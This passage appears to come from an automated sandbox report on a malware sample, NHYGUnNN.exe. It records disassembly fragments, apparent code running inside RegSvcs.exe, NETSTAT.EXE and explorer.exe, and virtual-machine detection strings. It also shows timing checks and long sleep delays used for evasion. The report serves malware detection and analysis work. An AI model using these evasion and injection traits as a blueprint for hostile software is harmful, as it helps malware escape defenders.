      Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_0000012A25D250CF push rdx; ret 0_2_0000012A25D250D5
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_00007FFCA43F417B push edx; ret 0_2_00007FFCA43F417C
      Source: C:\Users\user\Desktop\NHYGUnNN.exeCode function: 0_2_00007FFCA43F4185 push edx; ret 0_2_00007FFCA43F4186
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0134D0D1 push ecx; ret 1_2_0134D0E4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004210E9 push eax; ret 1_2_004210EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004210F2 push eax; ret 1_2_00421159
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0042109C push eax; ret 1_2_004210EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00421153 push eax; ret 1_2_00421159
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E901 push ebp; ret 1_2_0041E902
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00405A1E push ecx; ret 1_2_004059E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004172D0 push edx; retf 1_2_004172D6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040A2E4 push ecx; iretd 1_2_0040A2E7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409B74 push ecx; retf 1_2_00409B7C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408BAF push cx; ret 1_2_00408C27
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409CB7 push cs; retf 1_2_00409CCF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041A528 push ebp; ret 1_2_0041A532
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004085F9 pushfd ; iretd 1_2_00408601
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040CF66 push cs; ret 1_2_0040CF69
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041AFA7 push ecx; ret 1_2_0041AFA8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035ED0D1 push ecx; ret 10_2_035ED0E4
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BCB82F push cs; ret 10_2_00BCB832
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD9870 push ecx; ret 10_2_00BD9871
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF9BB push eax; ret 10_2_00BDFA22
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF9B2 push eax; ret 10_2_00BDF9B8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDD1CA push ebp; ret 10_2_00BDD1CB
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDF965 push eax; ret 10_2_00BDF9B8
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC423B push ds; iretd 10_2_00BC4250
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDFA1C push eax; ret 10_2_00BDFA22
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC4212 push ds; iretd 10_2_00BC4250
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BC4254 push 793A76E7h; ret 10_2_00BC425C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD5B99 push edx; retf 10_2_00BD5B9F
      Source: initial sampleStatic PE information: section name: .text entropy: 7.879743437690199
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760Thread sleep time: -36000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
      Source: C:\Users\user\Desktop\NHYGUnNN.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.1 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 9.6 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,10_2_00BD2CA0
      Source: C:\Users\user\Desktop\NHYGUnNN.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
      Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
      Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATAi
      Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]1_2_0132513A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132513A mov eax, dword ptr fs:[00000030h]1_2_0132513A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov eax, dword ptr fs:[00000030h]1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120 mov ecx, dword ptr fs:[00000030h]1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]1_2_012F9100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]1_2_012F9100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h]1_2_012F9100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC962 mov eax, dword ptr fs:[00000030h]1_2_012FC962
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]1_2_012FB171
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h]1_2_012FB171
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]1_2_0131B944
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h]1_2_0131B944
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]1_2_013751BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]1_2_013751BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]1_2_013751BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013751BE mov eax, dword ptr fs:[00000030h]1_2_013751BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF mov eax, dword ptr fs:[00000030h]1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013769A6 mov eax, dword ptr fs:[00000030h]1_2_013769A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]1_2_013261A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h]1_2_013261A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]1_2_013B49A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]1_2_013B49A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]1_2_013B49A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h]1_2_013B49A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322990 mov eax, dword ptr fs:[00000030h]1_2_01322990
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C182 mov eax, dword ptr fs:[00000030h]1_2_0131C182
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A185 mov eax, dword ptr fs:[00000030h]1_2_0132A185
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]1_2_012FB1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]1_2_012FB1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h]1_2_012FB1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013841E8 mov eax, dword ptr fs:[00000030h]1_2_013841E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]1_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]1_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]1_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h]1_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]1_2_0130B02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]1_2_0130B02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]1_2_0130B02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h]1_2_0130B02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]1_2_0132002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]1_2_0132002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]1_2_0132002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]1_2_0132002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132002D mov eax, dword ptr fs:[00000030h]1_2_0132002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]1_2_01377016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]1_2_01377016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377016 mov eax, dword ptr fs:[00000030h]1_2_01377016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]1_2_013C4015
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h]1_2_013C4015
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2073 mov eax, dword ptr fs:[00000030h]1_2_013B2073
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C1074 mov eax, dword ptr fs:[00000030h]1_2_013C1074
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]1_2_01310050
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01310050 mov eax, dword ptr fs:[00000030h]1_2_01310050
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov ecx, dword ptr fs:[00000030h]1_2_0132F0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]1_2_0132F0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h]1_2_0132F0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h]1_2_013220A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013390AF mov eax, dword ptr fs:[00000030h]1_2_013390AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9080 mov eax, dword ptr fs:[00000030h]1_2_012F9080
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]1_2_01373884
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373884 mov eax, dword ptr fs:[00000030h]1_2_01373884
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F58EC mov eax, dword ptr fs:[00000030h]1_2_012F58EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]1_2_012F40E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]1_2_012F40E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h]1_2_012F40E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]1_2_0131B8E4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h]1_2_0131B8E4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h]1_2_0138B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B131B mov eax, dword ptr fs:[00000030h]1_2_013B131B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
